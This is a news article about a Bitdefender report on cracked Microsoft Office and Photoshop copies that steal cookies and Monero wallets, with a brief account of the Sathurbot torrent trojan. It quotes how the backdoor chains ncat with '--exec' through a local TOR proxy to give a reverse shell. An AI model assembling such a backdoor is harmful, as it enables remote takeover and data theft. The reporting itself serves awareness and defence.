Cracked software is not safe to use, and there are plenty of examples to prove that. Hackers often utilize cracked copies of legitimate programs to spread malware. By downloading the program, the user may also get a trojan horse, backdoor, spyware. The latest such example involves cracked copies of Microsoft Office and Adobe Photoshop that harvest browser session cookies and Monero cryptocurrency wallets, according to a new Bitdefender report.
Hackers Using Cracked Microsoft Office and Adobe Photoshop to Spread Malware
It is no surprise that hackers decided to use these two particular programs to spread the information stealing malware. Microsoft Office and Adobe Photoshop are largely used applications, and as such, their cracked versions are also used by thousands of users.
As a result of downloading the cracked copy of Microsoft Office or Adobe Photoshop, the user’s computer will be “equipped” with malware that steals browser session cookies, Firefox’s entire profile history, and Monero cryptocurrency wallets. The malware also opens a backdoor on the compromised system and turns off its firewall.
“Once executed, the crack drops an instance of ncat.exe (a legitimate tool to send raw data over the network) as well as a TOR proxy,” Bitdefender explained in a blog post. A batch file, chknap.bat, is also bundled with the cracked program.
“The tools work together to create a powerful backdoor that communicates through TOR with its command and control center: the ncat binary uses the listening port of the TOR proxy (‘–proxy 127.0.0.1:9075’) and uses the standard ‘–exec’ parameter, which allows all input from the client to be sent to the application and responses to be sent back to the client over the socket (reverse shell behavior),” the report said.
Pirated Movies Distributed the Sathurbot Trojan
An older instance of a backdoor trojan targeting people who download pirated and cracked content (movies) is the Sathurbot trojan. The downloaded movie torrent would be a file with a video extension together with a visible codec pack installer and an explanatory text file. The torrent also has an apparent installer executable and a small text file. The end goal is to lure the potential victim into running the exe which would load the Sathurbot DLL.